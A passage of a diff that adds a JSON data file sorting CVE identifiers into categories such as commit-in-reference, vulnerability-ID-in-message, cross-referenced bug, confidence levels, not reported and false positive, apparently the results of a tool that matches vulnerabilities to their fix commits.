"CVE-2019-1000005", + "CVE-2019-1000021", + "CVE-2019-1020012", + "CVE-2020-1747", + "CVE-2020-1928", + "CVE-2020-5219", + "CVE-2020-5224", + "CVE-2020-5227", + "CVE-2020-5229", + "CVE-2020-5232", + "CVE-2020-5236", + "CVE-2020-5249", + "CVE-2020-5390", + "CVE-2020-5529", + "CVE-2020-6836", + "CVE-2020-7597", + "CVE-2020-7981", + "CVE-2020-8131", + "CVE-2020-9283", + "CVE-2020-10236", + "CVE-2020-10591", + "CVE-2020-10672", + "CVE-2020-10673" + ], + "COMMIT_IN_REFERENCE": [ + "CVE-2010-5312", + "CVE-2011-2765", + "CVE-2011-3186", + "CVE-2011-4030", + "CVE-2011-4461", + "CVE-2012-1109", + "CVE-2012-1176", + "CVE-2012-2417", + "CVE-2012-3366", + "CVE-2012-3408", + "CVE-2012-3458", + "CVE-2012-6550", + "CVE-2013-0256", + "CVE-2013-0294", + "CVE-2013-1800", + "CVE-2013-1801", + "CVE-2013-2013", + "CVE-2013-2035", + "CVE-2013-2191", + "CVE-2013-3300", + "CVE-2013-4116", + "CVE-2013-4413", + "CVE-2013-4562", + "CVE-2013-4701", + "CVE-2013-6465", + "CVE-2013-7378", + "CVE-2013-7459", + "CVE-2014-0072", + "CVE-2014-0073", + "CVE-2014-0120", + "CVE-2014-0121", + "CVE-2014-0160", + "CVE-2014-0177", + "CVE-2014-1202", + "CVE-2014-1403", + "CVE-2014-1604", + "CVE-2014-1904", + "CVE-2014-3120", + "CVE-2014-3488", + "CVE-2014-3579", + "CVE-2014-3599", + "CVE-2014-3741", + "CVE-2014-3995", + "CVE-2014-4657", + "CVE-2014-6394", + "CVE-2014-7192", + "CVE-2014-7193", + "CVE-2014-8115", + "CVE-2014-8681", + "CVE-2014-8682", + "CVE-2014-9130", + "CVE-2014-9489", + "CVE-2014-9682", + "CVE-2014-9721", + "CVE-2015-0846", + "CVE-2015-1326", + "CVE-2015-1838", + "CVE-2015-3206", + "CVE-2015-3220", + "CVE-2015-4082", + "CVE-2015-4410", + "CVE-2015-4412", + "CVE-2015-4619", + "CVE-2015-5081", + "CVE-2015-5147", + "CVE-2015-6584", + "CVE-2015-7294", + "CVE-2015-7337", + "CVE-2015-7541", + "CVE-2015-7809", + "CVE-2015-8309", + "CVE-2015-8310", + "CVE-2015-8747", + "CVE-2015-8814", + "CVE-2015-9235", + "CVE-2015-9241", + "CVE-2016-0750", + "CVE-2016-1505", + "CVE-2016-2166", + "CVE-2016-2537", + "CVE-2016-3693", + "CVE-2016-3720", + "CVE-2016-4442", + "CVE-2016-4562", + "CVE-2016-4563", + "CVE-2016-4564", + "CVE-2016-5104", + "CVE-2016-5431", + "CVE-2016-5697", + "CVE-2016-5841", + "CVE-2016-5842", + "CVE-2016-5851", + "CVE-2016-6298", + "CVE-2016-7528", + "CVE-2016-9298", + "CVE-2016-9909", + "CVE-2016-9910", + "CVE-2016-10149", + "CVE-2016-10345", + "CVE-2016-10522", + "CVE-2016-10524", + "CVE-2016-10531", + "CVE-2016-10536", + "CVE-2016-10540", + "CVE-2016-10544", + "CVE-2016-10554", + "CVE-2016-10556", + "CVE-2016-10577", + "CVE-2016-10703", + "CVE-2016-1000236", + "CVE-2016-1000338", + "CVE-2016-1000340", + "CVE-2016-1000343", + "CVE-2016-1000344", + "CVE-2017-0904", + "CVE-2017-2809", + "CVE-2017-3204", + "CVE-2017-5209", + "CVE-2017-5545", + "CVE-2017-5591", + "CVE-2017-5645", + "CVE-2017-5934", + "CVE-2017-5936", + "CVE-2017-5946", + "CVE-2017-7540", + "CVE-2017-7654", + "CVE-2017-7656", + "CVE-2017-8028", + "CVE-2017-8418", + "CVE-2017-8932", + "CVE-2017-11173", + "CVE-2017-12098", + "CVE-2017-12867", + "CVE-2017-12871", + "CVE-2017-13098", + "CVE-2017-14619", + "CVE-2017-14735", + "CVE-2017-15051", + "CVE-2017-15052", + "CVE-2017-15053", + "CVE-2017-15054", + "CVE-2017-15055", + "CVE-2017-15133", + "CVE-2017-15278", + "CVE-2017-15728", + "CVE-2017-15729", + "CVE-2017-15730", + "CVE-2017-15731", + "CVE-2017-15733", + "CVE-2017-15734", + "CVE-2017-15735", + "CVE-2017-15808", + "CVE-2017-15809", + "CVE-2017-15879", + "CVE-2017-15928", + "CVE-2017-16003", + "CVE-2017-16008", + "CVE-2017-16013", + "CVE-2017-16014", + "CVE-2017-16015", + "CVE-2017-16016", + "CVE-2017-16017", + "CVE-2017-16023", + "CVE-2017-16025", + "CVE-2017-16042", + "CVE-2017-16136", + "CVE-2017-16226", + "CVE-2017-16228", + "CVE-2017-16244", + "CVE-2017-16613", + "CVE-2017-16615", + "CVE-2017-16616", + "CVE-2017-16618", + "CVE-2017-16876", + "CVE-2017-16877", + "CVE-2017-16880", + "CVE-2017-17042", + "CVE-2017-18239", + "CVE-2017-18367", + "CVE-2017-1000188", + "CVE-2017-1000189", + "CVE-2017-1000228", + "CVE-2017-1000486", + "CVE-2017-1000487", + "CVE-2017-1000491", + "CVE-2017-1001002", + "CVE-2017-1001003", + "CVE-2017-1001004", + "CVE-2017-1002150", + "CVE-2018-1099", + "CVE-2018-1320", + "CVE-2018-3712", + "CVE-2018-3715", + "CVE-2018-3721", + "CVE-2018-3726", + "CVE-2018-3732", + "CVE-2018-3733", + "CVE-2018-3740", + "CVE-2018-3741", + "CVE-2018-3750", + "CVE-2018-3759", + "CVE-2018-3769", + "CVE-2018-3774", + "CVE-2018-3778", + "CVE-2018-3786", + "CVE-2018-5968", + "CVE-2018-6333", + "CVE-2018-7260", + "CVE-2018-7408", + "CVE-2018-7560", + "CVE-2018-7651", + "CVE-2018-7753", + "CVE-2018-8016", + "CVE-2018-9109", + "CVE-2018-9110", + "CVE-2018-9206", + "CVE-2018-10092", + "CVE-2018-10094", + "CVE-2018-10095", + "CVE-2018-10188", + "CVE-2018-10366", + "CVE-2018-10903", + "CVE-2018-10936", + "CVE-2018-11771", + "CVE-2018-11798", + "CVE-2018-12043", + "CVE-2018-12418", + "CVE-2018-12541", + "CVE-2018-12557", + "CVE-2018-12615", + "CVE-2018-12976", + "CVE-2018-13447", + "CVE-2018-13448", + "CVE-2018-13449", + "CVE-2018-13450", + "CVE-2018-13797", + "CVE-2018-13818", + "CVE-2018-14041", + "CVE-2018-14718", + "CVE-2018-14719", + "CVE-2018-14720", + "CVE-2018-14721", + "CVE-2018-14840", + "CVE-2018-15178", + "CVE-2018-15531", + "CVE-2018-16329", + "CVE-2018-16470", + "CVE-2018-16472", + "CVE-2018-16492", + "CVE-2018-17104", + "CVE-2018-17187", + "CVE-2018-17419", + "CVE-2018-18389", + "CVE-2018-18476", + "CVE-2018-19048", + "CVE-2018-19184", + "CVE-2018-19360", + "CVE-2018-19361", + "CVE-2018-19362", + "CVE-2018-19992", + "CVE-2018-19993", + "CVE-2018-19994", + "CVE-2018-20059", + "CVE-2018-20433", + "CVE-2018-20594", + "CVE-2018-20595", + "CVE-2018-20677", + "CVE-2018-20801", + "CVE-2018-20835", + "CVE-2018-20962", + "CVE-2018-1000089", + "CVE-2018-1000119", + "CVE-2018-1000129", + "CVE-2018-1000134", + "CVE-2018-1000164", + "CVE-2018-1000518", + "CVE-2018-1000525", + "CVE-2018-1000531", + "CVE-2018-1000538", + "CVE-2018-1000620", + "CVE-2018-1000632", + "CVE-2018-1000805", + "CVE-2018-1000807", + "CVE-2018-1000808", + "CVE-2018-1000814", + "CVE-2018-1000843", + "CVE-2018-1000850", + "CVE-2018-1000888", + "CVE-2018-1002201", + "CVE-2018-1002207", + "CVE-2018-1999024", + "CVE-2019-3564", + "CVE-2019-3826", + "CVE-2019-5413", + "CVE-2019-5484", + "CVE-2019-5884", + "CVE-2019-6798", + "CVE-2019-7164", + "CVE-2019-7548", + "CVE-2019-8457", + "CVE-2019-9658", + "CVE-2019-10131", + "CVE-2019-10157", + "CVE-2019-10217", + "CVE-2019-10241", + "CVE-2019-10682", + "CVE-2019-10749", + "CVE-2019-10751", + "CVE-2019-10752", + "CVE-2019-10762", + "CVE-2019-10767", + "CVE-2019-10776", + "CVE-2019-10781", + "CVE-2019-10787", + "CVE-2019-10792", + "CVE-2019-10793", + "CVE-2019-10795", + "CVE-2019-10799", + "CVE-2019-10867", + "CVE-2019-11272", + "CVE-2019-11358", + "CVE-2019-11514", + "CVE-2019-11768", + "CVE-2019-11777", + "CVE-2019-12277", + "CVE-2019-12402", + "CVE-2019-12616", + "CVE-2019-12741", + "CVE-2019-12814", + "CVE-2019-13127", + "CVE-2019-13135", + "CVE-2019-13173", + "CVE-2019-13295", + "CVE-2019-13574", + "CVE-2019-13644", + "CVE-2019-14540", + "CVE-2019-14668", + "CVE-2019-14669", + "CVE-2019-14671", + "CVE-2019-14672", + "CVE-2019-14751", + "CVE-2019-14806", + "CVE-2019-14837", + "CVE-2019-14862", + "CVE-2019-14863", + "CVE-2019-14893", + "CVE-2019-14980", + "CVE-2019-15481", + "CVE-2019-15532", + "CVE-2019-16317", + "CVE-2019-16318", + "CVE-2019-16335", + "CVE-2019-16676", + "CVE-2019-16761", + "CVE-2019-16762", + "CVE-2019-16763", + "CVE-2019-16766", + "CVE-2019-16769", + "CVE-2019-16771", + "CVE-2019-16778", + "CVE-2019-16779", + "CVE-2019-16784", + "CVE-2019-16785", + "CVE-2019-16786", + "CVE-2019-16789", + "CVE-2019-16792", + "CVE-2019-17267", + "CVE-2019-17496", + "CVE-2019-17513", + "CVE-2019-17531", + "CVE-2019-17541", + "CVE-2019-17592", + "CVE-2019-18622", + "CVE-2019-18656", + "CVE-2019-18848", + "CVE-2019-18857", + "CVE-2019-18874", + "CVE-2019-18978", + "CVE-2019-18981", + "CVE-2019-18982", + "CVE-2019-18985", + "CVE-2019-18986", + "CVE-2019-19010", + "CVE-2019-19275", + "CVE-2019-19507", + "CVE-2019-19576", + "CVE-2019-19619", + "CVE-2019-19687", + "CVE-2019-19703", + "CVE-2019-19794", + "CVE-2019-20330", + "CVE-2019-1000005", + "CVE-2019-1000021", + "CVE-2019-1020012", + "CVE-2020-1747", + "CVE-2020-5219", + "CVE-2020-5224", + "CVE-2020-5227", + "CVE-2020-5229", + "CVE-2020-5232", + "CVE-2020-5236", + "CVE-2020-5249", + "CVE-2020-5390", + "CVE-2020-5529", + "CVE-2020-6836", + "CVE-2020-7597", + "CVE-2020-7981", + "CVE-2020-8131", + "CVE-2020-9283", + "CVE-2020-10236", + "CVE-2020-10591", + "CVE-2020-10672", + "CVE-2020-10673" + ], + "VULN_ID_IN_MESSAGE": [ + "CVE-2013-0256", + "CVE-2013-2191", + "CVE-2014-0160", + "CVE-2014-0177", + "CVE-2014-1403", + "CVE-2014-8152", + "CVE-2015-0276", + "CVE-2015-0838", + "CVE-2015-1326", + "CVE-2015-1782", + "CVE-2015-7541", + "CVE-2015-8309", + "CVE-2016-3114", + "CVE-2016-4974", + "CVE-2016-5180", + "CVE-2016-6298", + "CVE-2016-10173", + "CVE-2017-5934", + "CVE-2017-11427", + "CVE-2017-11905", + "CVE-2017-11910", + "CVE-2017-15133", + "CVE-2017-16613", + "CVE-2017-16876", + "CVE-2018-8128", + "CVE-2018-8177", + "CVE-2018-8178", + "CVE-2018-8381", + "CVE-2018-8390", + "CVE-2018-10092", + "CVE-2018-10094", + "CVE-2018-10095", + "CVE-2018-10936", + "CVE-2018-11093", + "CVE-2018-12541", + "CVE-2018-12976", + "CVE-2018-16470", + "CVE-2018-19992", + "CVE-2018-19993", + "CVE-2018-19994", + "CVE-2018-20028", + "CVE-2018-20433", + "CVE-2019-0911", + "CVE-2019-0912", + "CVE-2019-0917", + "CVE-2019-0922", + "CVE-2019-0924", + "CVE-2019-0925", + "CVE-2019-0933", + "CVE-2019-1052", + "CVE-2019-1062", + "CVE-2019-1092", + "CVE-2019-1103", + "CVE-2019-1106", + "CVE-2019-1107", + "CVE-2019-1139", + "CVE-2019-1195", + "CVE-2019-1196", + "CVE-2019-1197", + "CVE-2019-10642", + "CVE-2019-10643", + "CVE-2019-11512", + "CVE-2019-14751", + "CVE-2019-16784", + "CVE-2019-18622", + "CVE-2019-18848", + "CVE-2020-5219", + "CVE-2020-5390", + "CVE-2020-9283" + ], + "VULN_ID_IN_LINKED_ISSUE": [ + "CVE-2014-3579", + "CVE-2014-3612", + "CVE-2016-4974", + "CVE-2016-6298", + "CVE-2016-10173", + "CVE-2017-5946", + "CVE-2017-8028", + "CVE-2018-1320", + "CVE-2019-3826", + "CVE-2019-14863", + "CVE-2020-1747", + "CVE-2020-8131" + ], + "XREF_BUG": [ + "CVE-2013-1879", + "CVE-2013-1880", + "CVE-2014-3579", + "CVE-2016-2166", + "CVE-2017-15703", + "CVE-2018-1309", + "CVE-2018-1320", + "CVE-2018-8013", + "CVE-2018-8016", + "CVE-2018-11771", + "CVE-2018-17187", + "CVE-2018-17193", + "CVE-2018-17194", + "CVE-2018-17195", + "CVE-2020-1928", + "CVE-2012-1176", + "CVE-2013-4116", + "CVE-2014-3120", + "CVE-2014-6394", + "CVE-2014-9721", + "CVE-2015-4082", + "CVE-2015-7294", + "CVE-2015-8854", + "CVE-2016-3720", + "CVE-2016-5007", + "CVE-2016-6298", + "CVE-2016-9909", + "CVE-2016-9910", + "CVE-2016-10149", + "CVE-2016-10173", + "CVE-2017-2809", + "CVE-2017-5545", + "CVE-2017-5946", + "CVE-2017-7540", + "CVE-2017-8028", + "CVE-2017-8418", + "CVE-2017-8932", + "CVE-2017-12098", + "CVE-2017-14735", + "CVE-2017-15133", + "CVE-2017-15703", + "CVE-2017-15879", + "CVE-2017-16013", + "CVE-2017-16023", + "CVE-2017-16025", + "CVE-2017-16042", + "CVE-2017-16615", + "CVE-2017-16616", + "CVE-2017-16618", + "CVE-2017-18239", + "CVE-2018-1098", + "CVE-2018-1099", + "CVE-2018-1309", + "CVE-2018-3740", + "CVE-2018-3769", + "CVE-2018-3778", + "CVE-2018-3786", + "CVE-2018-5968", + "CVE-2018-7408", + "CVE-2018-7651", + "CVE-2018-7753", + "CVE-2018-9206", + "CVE-2018-10903", + "CVE-2018-12418", + "CVE-2018-12541", + "CVE-2018-13797", + "CVE-2018-14718", + "CVE-2018-14719", + "CVE-2018-14720", + "CVE-2018-14721", + "CVE-2018-14840", + "CVE-2018-15178", + "CVE-2018-17104", + "CVE-2018-17193", + "CVE-2018-17194", + "CVE-2018-17195", + "CVE-2018-17419", + "CVE-2018-18476", + "CVE-2018-19360", + "CVE-2018-19361", + "CVE-2018-19362", + "CVE-2018-20059", + "CVE-2018-20594", + "CVE-2018-20595", + "CVE-2018-20677", + "CVE-2018-20962", + "CVE-2018-1000164", + "CVE-2018-1000525", + "CVE-2018-1000531", + "CVE-2018-1000538", + "CVE-2018-1000620", + "CVE-2018-1000632", + "CVE-2018-1000805", + "CVE-2018-1000807", + "CVE-2018-1000808", + "CVE-2018-1000814", + "CVE-2018-1000843", + "CVE-2018-1002207", + "CVE-2018-1002208", + "CVE-2019-3826", + "CVE-2019-7164", + "CVE-2019-7548", + "CVE-2019-7722", + "CVE-2019-9658", + "CVE-2019-10217", + "CVE-2019-10248", + "CVE-2019-11358", + "CVE-2019-11777", + "CVE-2019-12814", + "CVE-2019-13644", + "CVE-2019-14540", + "CVE-2019-14668", + "CVE-2019-14669", + "CVE-2019-14671", + "CVE-2019-14672", + "CVE-2019-14862", + "CVE-2019-14863", + "CVE-2019-14893", + "CVE-2019-15481", + "CVE-2019-15532", + "CVE-2019-15658", + "CVE-2019-16335", + "CVE-2019-17267", + "CVE-2019-17531", + "CVE-2019-18874", + "CVE-2019-19507", + "CVE-2019-19703", + "CVE-2019-19794", + "CVE-2019-20330", + "CVE-2019-1000005", + "CVE-2020-1747", + "CVE-2020-1928", + "CVE-2020-8131", + "CVE-2020-10672", + "CVE-2020-10673" + ], + "COMMIT_IS_SECURITY_RELEVANT": [], + "medium": [ + "CVE-2011-1950", + "CVE-2011-3923", + "CVE-2012-2378", + "CVE-2012-3536", + "CVE-2012-5812", + "CVE-2013-2172", + "CVE-2013-3567", + "CVE-2013-4002", + "CVE-2013-4111", + "CVE-2013-4316", + "CVE-2014-2525", + "CVE-2014-3250", + "CVE-2014-3576", + "CVE-2014-5277", + "CVE-2014-7189", + "CVE-2014-9970", + "CVE-2015-1772", + "CVE-2015-6524", + "CVE-2015-8862", + "CVE-2016-4000", + "CVE-2016-4977", + "CVE-2016-8738", + "CVE-2016-10100", + "CVE-2016-10528", + "CVE-2016-10529", + "CVE-2016-10558", + "CVE-2016-10559", + "CVE-2016-10560", + "CVE-2016-10574", + "CVE-2016-10575", + "CVE-2016-10591", + "CVE-2016-10611", + "CVE-2016-10694", + "CVE-2016-10735", + "CVE-2017-2617", + "CVE-2017-2638", + "CVE-2017-2667", + "CVE-2017-4973", + "CVE-2017-5641", + "CVE-2017-5858", + "CVE-2017-7674", + "CVE-2017-9796", + "CVE-2017-11467", + "CVE-2017-12616", + "CVE-2017-12620", + "CVE-2017-12622", + "CVE-2017-16007", + "CVE-2017-1000389", + "CVE-2017-1000451", + "CVE-2018-1260", + "CVE-2018-1261", + "CVE-2018-1263", + "CVE-2018-3714", + "CVE-2018-3731", + "CVE-2018-3738", + "CVE-2018-6591", + "CVE-2018-14637", + "CVE-2018-16459", + "CVE-2018-16490", + "CVE-2018-17197", + "CVE-2018-1000013", + "CVE-2018-1000014", + "CVE-2019-0207", + "CVE-2019-3772", + "CVE-2019-7617", + "CVE-2019-8331", + "CVE-2019-9212", + "CVE-2019-9844", + "CVE-2019-10089", + "CVE-2019-10090", + "CVE-2019-10240", + "CVE-2019-10745", + "CVE-2019-10748", + "CVE-2019-10750", + "CVE-2019-10756", + "CVE-2019-10757", + "CVE-2019-10760", + "CVE-2019-10764", + "CVE-2019-10778", + "CVE-2019-10780", + "CVE-2019-10797", + "CVE-2019-10904", + "CVE-2019-11767", + "CVE-2019-12404", + "CVE-2019-12407", + "CVE-2019-13209", + "CVE-2019-15657", + "CVE-2019-16197", + "CVE-2019-18889", + "CVE-2019-19212", + "CVE-2019-1010266", + "CVE-2020-8125", + "CVE-2020-9281" + ], + "low": [ + "CVE-2013-1607", + "CVE-2014-3577", + "CVE-2014-7809", + "CVE-2016-4438", + "CVE-2016-10543", + "CVE-2016-10564", + "CVE-2016-10569", + "CVE-2017-2652", + "CVE-2017-7688", + "CVE-2018-16462", + "CVE-2019-10077" + ], + "not_found": [ + "CVE-2012-0881", + "CVE-2014-7143", + "CVE-2015-0250", + "CVE-2015-3627", + "CVE-2016-9962", + "CVE-2018-1196", + "CVE-2018-7576", + "CVE-2018-8031", + "CVE-2019-0219", + "CVE-2019-3792", + "CVE-2019-14537" + ], + "not_reported": [ + "CVE-2010-0156", + "CVE-2010-2076", + "CVE-2010-2245", + "CVE-2010-4534", + "CVE-2010-4535", + "CVE-2010-5142", + "CVE-2011-1772", + "CVE-2011-2730", + "CVE-2011-2732", + "CVE-2011-3848", + "CVE-2012-0392", + "CVE-2012-1054", + "CVE-2012-1098", + "CVE-2012-1099", + "CVE-2012-1906", + "CVE-2012-1986", + "CVE-2012-1987", + "CVE-2012-2379", + "CVE-2012-3451", + "CVE-2012-3867", + "CVE-2012-4449", + "CVE-2012-5055", + "CVE-2013-0248", + "CVE-2013-0285", + "CVE-2013-1654", + "CVE-2013-2115", + "CVE-2013-2254", + "CVE-2013-4152", + "CVE-2013-4204", + "CVE-2013-4286", + "CVE-2013-4322", + "CVE-2013-4428", + "CVE-2013-4761", + "CVE-2013-6235", + "CVE-2013-7315", + "CVE-2014-0035", + "CVE-2014-0050", + "CVE-2014-0086", + "CVE-2014-0097", + "CVE-2014-0116", + "CVE-2014-0228", + "CVE-2014-1829", + "CVE-2014-3630", + "CVE-2014-3709", + "CVE-2015-0208", + "CVE-2015-0289", + "CVE-2015-0293", + "CVE-2015-1830", + "CVE-2015-2068", + "CVE-2015-3192", + "CVE-2015-5207", + "CVE-2015-5211", + "CVE-2015-5241", + "CVE-2015-5250", + "CVE-2015-8861", + "CVE-2016-0762", + "CVE-2016-3081", + "CVE-2016-3959", + "CVE-2016-4465", + "CVE-2016-4972", + "CVE-2016-5388", + "CVE-2016-6519", + "CVE-2016-6652", + "CVE-2016-6793", + "CVE-2016-6794", + "CVE-2016-6796", + "CVE-2016-6797", + "CVE-2016-6817", + "CVE-2016-8629", + "CVE-2016-8739", + "CVE-2016-8745", + "CVE-2016-10532", + "CVE-2016-10542", + "CVE-2016-10550", + "CVE-2016-10557", + "CVE-2016-10562", + "CVE-2016-10566", + "CVE-2016-10567", + "CVE-2016-10568", + "CVE-2016-10570", + "CVE-2016-10571", + "CVE-2016-10572", + "CVE-2016-10573", + "CVE-2016-10576", + "CVE-2016-10579", + "CVE-2016-10582", + "CVE-2016-10586", + "CVE-2016-10587", + "CVE-2016-10588", + "CVE-2016-10626", + "CVE-2016-10750", + "CVE-2016-1000282", + "CVE-2017-0224", + "CVE-2017-2592", + "CVE-2017-2649", + "CVE-2017-4952", + "CVE-2017-4971", + "CVE-2017-5638", + "CVE-2017-5954", + "CVE-2017-7660", + "CVE-2017-7661", + "CVE-2017-7662", + "CVE-2017-7666", + "CVE-2017-7675", + "CVE-2017-7957", + "CVE-2017-8046", + "CVE-2017-9096", + "CVE-2017-9214", + "CVE-2017-9265", + "CVE-2017-11503", + "CVE-2017-12158", + "CVE-2017-12159", + "CVE-2017-12160", + "CVE-2017-12631", + "CVE-2017-14683", + "CVE-2017-15720", + "CVE-2017-16029", + "CVE-2017-16083", + "CVE-2017-16084", + "CVE-2017-16107", + "CVE-2017-17835", + "CVE-2017-1000042", + "CVE-2017-1000431", + "CVE-2018-0953", + "CVE-2018-1193", + "CVE-2018-1259", + "CVE-2018-1304", + "CVE-2018-1314", + "CVE-2018-1339", + "CVE-2018-3728", + "CVE-2018-3743", + "CVE-2018-3757", + "CVE-2018-3758", + "CVE-2018-6341", + "CVE-2018-6873", + "CVE-2018-8008", + "CVE-2018-8026", + "CVE-2018-8315", + "CVE-2018-8359", + "CVE-2018-8465", + "CVE-2018-8473", + "CVE-2018-8510", + "CVE-2018-8541", + "CVE-2018-10862", + "CVE-2018-10912", + "CVE-2018-11087", + "CVE-2018-11758", + "CVE-2018-11777", + "CVE-2018-13790", + "CVE-2018-14642", + "CVE-2018-14732", + "CVE-2018-15758", + "CVE-2018-16485", + "CVE-2018-17184", + "CVE-2018-19787", + "CVE-2018-20094", + "CVE-2018-1000854", + "CVE-2019-0226", + "CVE-2019-1001", + "CVE-2019-3774", + "CVE-2019-3799", + "CVE-2019-3808", + "CVE-2019-3810", + "CVE-2019-3847", + "CVE-2019-3850", + "CVE-2019-3894", + "CVE-2019-5018", + "CVE-2019-5444", + "CVE-2019-5479", + "CVE-2019-7537", + "CVE-2019-7644", + "CVE-2019-9155", + "CVE-2019-10071", + "CVE-2019-10158", + "CVE-2019-10174", + "CVE-2019-10354", + "CVE-2019-10754", + "CVE-2019-10763", + "CVE-2019-10766", + "CVE-2019-10770", + "CVE-2019-10771", + "CVE-2019-10777", + "CVE-2019-11016", + "CVE-2019-11269", + "CVE-2019-11289", + "CVE-2019-11328", + "CVE-2019-12203", + "CVE-2019-12245", + "CVE-2019-12405", + "CVE-2019-12419", + "CVE-2019-12423", + "CVE-2019-12617", + "CVE-2019-12748", + "CVE-2019-14280", + "CVE-2019-14838", + "CVE-2019-15608", + "CVE-2019-17223", + "CVE-2019-17359", + "CVE-2019-17554", + "CVE-2019-19316", + "CVE-2019-19919", + "CVE-2020-1937", + "CVE-2020-1938", + "CVE-2020-7596", + "CVE-2020-8134" + ], + "false_positive": [ + "CVE-2010-0684", + "CVE-2011-2929", + "CVE-2011-2930", + "CVE-2011-2931", + "CVE-2011-2932", + "CVE-2011-3869", + "CVE-2011-3870", + "CVE-2011-3871", + "CVE-2011-3872", + "CVE-2011-4104", + "CVE-2011-4838", + "CVE-2011-5036", + "CVE-2011-5097", + "CVE-2011-5098", + "CVE-2012-0394", + "CVE-2012-2098", + "CVE-2012-2139", + "CVE-2012-2660", + "CVE-2012-2661", + "CVE-2012-3865", + "CVE-2012-4386", + "CVE-2012-4387", + "CVE-2012-4520", + "CVE-2012-5633", + "CVE-2012-6662", + "CVE-2012-6684", + "CVE-2012-6685", + "CVE-2012-6708", + "CVE-2013-0262", + "CVE-2013-0263", + "CVE-2013-1812", + "CVE-2013-2132", + "CVE-2013-2134", + "CVE-2013-2135", + "CVE-2013-2275", + "CVE-2013-4249", + "CVE-2013-4251", + "CVE-2013-4353", + "CVE-2013-4477", + "CVE-2013-5093", + "CVE-2013-5123", + "CVE-2013-6044", + "CVE-2013-6348", + "CVE-2013-6429", + "CVE-2013-6430", + "CVE-2013-7370", + "CVE-2013-7397", + "CVE-2013-7398", + "CVE-2014-0012", + "CVE-2014-0014", + "CVE-2014-0075", + "CVE-2014-0107", + "CVE-2014-0109", + "CVE-2014-0110", + "CVE-2014-0193", + "CVE-2014-0224", + "CVE-2014-0225", + "CVE-2014-1402", + "CVE-2014-1830", + "CVE-2014-1832", + "CVE-2014-1858", + "CVE-2014-1859", + "CVE-2014-1869", + "CVE-2014-1932", + "CVE-2014-1933", + "CVE-2014-2053", + "CVE-2014-2235", + "CVE-2014-2538", + "CVE-2014-3007", + "CVE-2014-3505", + "CVE-2014-3506", + "CVE-2014-3509", + "CVE-2014-3511", + "CVE-2014-3572", + "CVE-2014-3578", + "CVE-2014-3600", + "CVE-2014-3625", + "CVE-2014-3994", + "CVE-2014-4172", + "CVE-2014-4658", + "CVE-2014-4678", + "CVE-2014-7202", + "CVE-2014-7203", + "CVE-2014-7205", + "CVE-2014-8176", + "CVE-2014-8547", + "CVE-2014-8548", + "CVE-2014-8549", + "CVE-2014-8650", + "CVE-2014-8991", + "CVE-2014-9720", + "CVE-2014-10068", + "CVE-2014-10077", + "CVE-2015-0204", + "CVE-2015-0205", + "CVE-2015-0206", + "CVE-2015-0209", + "CVE-2015-0286", + "CVE-2015-0287", + "CVE-2015-0288", + "CVE-2015-0290", + "CVE-2015-0292", + "CVE-2015-1208", + "CVE-2015-1788", + "CVE-2015-1789", + "CVE-2015-1791", + "CVE-2015-1792", + "CVE-2015-1793", + "CVE-2015-2156", + "CVE-2015-2296", + "CVE-2015-2912", + "CVE-2015-2913", + "CVE-2015-3010", + "CVE-2015-3193", + "CVE-2015-3195", + "CVE-2015-3196", + "CVE-2015-3197", + "CVE-2015-3253", + "CVE-2015-3395", + "CVE-2015-3996", + "CVE-2015-4053", + "CVE-2015-4706", + "CVE-2015-5159", + "CVE-2015-5253", + "CVE-2015-5254", + "CVE-2015-5305", + "CVE-2015-5344", + "CVE-2015-5349", + "CVE-2015-5607", + "CVE-2015-6748", + "CVE-2015-6818", + "CVE-2015-6821", + "CVE-2015-6822", + "CVE-2015-6823", + "CVE-2015-6824", + "CVE-2015-6918", + "CVE-2015-7314", + "CVE-2015-7315", + "CVE-2015-7316", + "CVE-2015-7528", + "CVE-2015-7559", + "CVE-2015-8213", + "CVE-2015-8216", + "CVE-2015-8217", + "CVE-2015-8218", + "CVE-2015-8618", + "CVE-2015-8748", + "CVE-2015-8968", + "CVE-2015-9243", + "CVE-2015-9251", + "CVE-2016-1905", + "CVE-2016-2108", + "CVE-2016-2160", + "CVE-2016-2177", + "CVE-2016-2512", + "CVE-2016-2513", + "CVE-2016-2788", + "CVE-2016-3092", + "CVE-2016-3094", + "CVE-2016-4009", + "CVE-2016-4055", + "CVE-2016-4425", + "CVE-2016-4855", + "CVE-2016-4970", + "CVE-2016-6186", + "CVE-2016-6304", + "CVE-2016-6580", + "CVE-2016-6581", + "CVE-2016-6801", + "CVE-2016-6814", + "CVE-2016-6816", + "CVE-2016-6823", + "CVE-2016-7036", + "CVE-2016-7569", + "CVE-2016-8568", + "CVE-2016-8569", + "CVE-2016-8579", + "CVE-2016-8610", + "CVE-2016-8640", + "CVE-2016-8747", + "CVE-2016-8750", + "CVE-2016-8867", + "CVE-2016-9015", + "CVE-2016-9121", + "CVE-2016-9122", + "CVE-2016-9189", + "CVE-2016-9190", + "CVE-2016-9243", + "CVE-2016-9814", + "CVE-2016-9878", + "CVE-2016-9879", + "CVE-2016-10033", + "CVE-2016-10127", + "CVE-2016-10129", + "CVE-2016-10190", + "CVE-2016-10191", + "CVE-2016-10192", + "CVE-2016-10193", + "CVE-2016-10526", + "CVE-2016-10538", + "CVE-2016-10555", + "CVE-2016-10745", + "CVE-2016-1000232", + "CVE-2017-0905", + "CVE-2017-0906", + "CVE-2017-0907", + "CVE-2017-0909", + "CVE-2017-0929", + "CVE-2017-2582", + "CVE-2017-2670", + "CVE-2017-3156", + "CVE-2017-4995", + "CVE-2017-5537", + "CVE-2017-5594", + "CVE-2017-5637", + "CVE-2017-7481", + "CVE-2017-7525", + "CVE-2017-7536", + "CVE-2017-7545", + "CVE-2017-7653", + "CVE-2017-7657", + "CVE-2017-7860", + "CVE-2017-7861", + "CVE-2017-8045", + "CVE-2017-8109", + "CVE-2017-8342", + "CVE-2017-8359", + "CVE-2017-9841", + "CVE-2017-10910", + "CVE-2017-11424", + "CVE-2017-11428", + "CVE-2017-11610", + "CVE-2017-12605", + "CVE-2017-12624", + "CVE-2017-12629", + "CVE-2017-12868", + "CVE-2017-12873", + "CVE-2017-14063", + "CVE-2017-14136", + "CVE-2017-14506", + "CVE-2017-14623", + "CVE-2017-15103", + "CVE-2017-15288", + "CVE-2017-15612", + "CVE-2017-15914", + "CVE-2017-16006", + "CVE-2017-16010", + "CVE-2017-16018", + "CVE-2017-16026", + "CVE-2017-16031", + "CVE-2017-16138", + "CVE-2017-16558", + "CVE-2017-16570", + "CVE-2017-16759", + "CVE-2017-16762", + "CVE-2017-16792", + "CVE-2017-17485", + "CVE-2017-17760", + 